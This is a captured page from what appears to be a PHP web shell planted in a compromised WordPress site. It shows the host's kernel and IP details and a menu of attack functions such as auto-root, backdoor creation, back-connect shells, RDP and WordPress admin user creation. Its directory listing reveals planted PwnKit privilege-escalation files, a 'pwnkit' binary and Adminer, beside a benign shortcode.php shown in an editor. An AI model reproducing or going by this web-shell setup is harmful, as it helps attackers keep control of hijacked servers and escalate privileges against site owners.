Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 13.59.182.74
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
addify5 /
public_html /
wp-includes /
blocks /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
420
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
archives.php
3.21
KB
-rwxr-xr-x
block.php
1006
B
-rwxr-xr-x
calendar.php
2.02
KB
-rwxr-xr-x
categories.php
3.01
KB
-rwxr-xr-x
error_log
21.16
KB
-rw-r--r--
latest-comments.php
5.62
KB
-rwxr-xr-x
latest-posts.php
4.98
KB
-rwxr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
rss.php
4.42
KB
-rwxr-xr-x
search.php
2.14
KB
-rwxr-xr-x
shortcode.php
794
B
-rwxr-xr-x
tag-cloud.php
1.78
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shortcode.php
<?php /** * Server-side rendering of the `core/shortcode` block. * * @package WordPress */ /** * Performs wpautop() on the shortcode block content. * * @param array $attributes The block attributes. * @param string $content The block content. * * @return string Returns the block content. */ function render_block_core_shortcode( $attributes, $content ) { return wpautop( $content ); } /** * Registers the `core/shortcode` block on server. */ function register_block_core_shortcode() { register_block_type( 'core/shortcode', array( 'attributes' => array( 'text' => array( 'type' => 'string', 'source' => 'html', ), ), 'render_callback' => 'render_block_core_shortcode', ) ); } add_action( 'init', 'register_block_core_shortcode' );
Close